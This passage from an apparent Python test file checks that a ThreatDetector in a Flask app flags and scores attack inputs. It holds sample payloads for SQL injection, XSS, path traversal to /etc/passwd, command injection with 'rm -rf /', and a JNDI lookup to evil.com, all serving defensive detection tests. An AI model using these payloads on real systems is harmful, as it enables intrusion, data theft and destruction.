assert any(r.threat_type == C.THREAT_TYPE_NESTED_EXPRESSION and r.score == 80 for r in results)
def test_sqli_union_select_scores_90():
detector = ThreatDetector()
results = detector.scan_input("UNION SELECT password FROM users", "q")
assert any(r.threat_type == C.THREAT_TYPE_SQL_INJECTION and r.score == 90 for r in results)
def test_sqli_or_1_eq_1_scores_90():
detector = ThreatDetector()
results = detector.scan_input("a' OR 1=1 --", "q")
assert any(r.threat_type == C.THREAT_TYPE_SQL_INJECTION and r.score == 90 for r in results)
def test_xss_scores_70():
detector = ThreatDetector()
results = detector.scan_input("<script>alert(1)</script>", "q")
assert any(r.threat_type == C.THREAT_TYPE_XSS and r.score == 70 for r in results)
def test_path_traversal_scores_60():
detector = ThreatDetector()
results = detector.scan_input("../../etc/passwd", "path")
assert any(r.threat_type == C.THREAT_TYPE_PATH_TRAVERSAL and r.score == 60 for r in results)
def test_command_injection_scores_85():
detector = ThreatDetector()
results = detector.scan_input("test; rm -rf /", "cmd")
assert any(r.threat_type == C.THREAT_TYPE_COMMAND_INJECTION and r.score == 85 for r in results)
def test_scan_request_picks_up_args():
app = Flask(__name__)
detector = ThreatDetector()
with app.test_request_context("/?q=${jndi:ldap://evil.com/a}"):
results = detector.scan_request(request)
assert any(r.field_name == "args.q" and r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)